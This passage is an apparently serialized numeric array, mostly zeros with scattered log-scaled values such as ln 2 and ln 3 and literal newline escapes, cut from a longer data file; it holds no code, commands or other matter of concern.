0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 5.346437018291705, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.833213344056216, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 5.8858724694518925, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.9957322735539913, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0,\n 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0, 0.0, 2.4849066497880004, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.5649493574615367, 0, 0.0, \n 2.6390573296152584, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.8066624897703196, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.9957322735539913, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.8918202981106265, 0, 0.0, 0.0, 0.0, \n 4.8991863767100545, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0,\n 0.0, 0.0, 0.0, 5.0301047650807, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.0910424533583156, 4.292158018817389, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 3.2958368660043296, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 5.017279836814924, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 3.58351893845611, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.6094379124341003, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 9.129416400820892, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0, 3.0841946160253877,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 3.9318256327243257, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 4.634728988229636, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.101797476893978, 0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 2.302585092994046, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.332718793265369, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, \n 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.791759469228055, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 13.426106100346976, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 4.04305126783455, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9318256327243257, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 5.58914919554,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 2.1972245773362196, 3.3322045101752034, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.1972245773362196, 0.0, 1.0986122886681098, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, \n 0, 3.649511027115099, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 3.9512437185814275, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 2.1972245773362196, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 2.9957322735539913, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 5.723585101952381, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 3.2188758248682006, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9889840465642745, 0, 2.833213344056216, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, \n 4.518263445217986, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 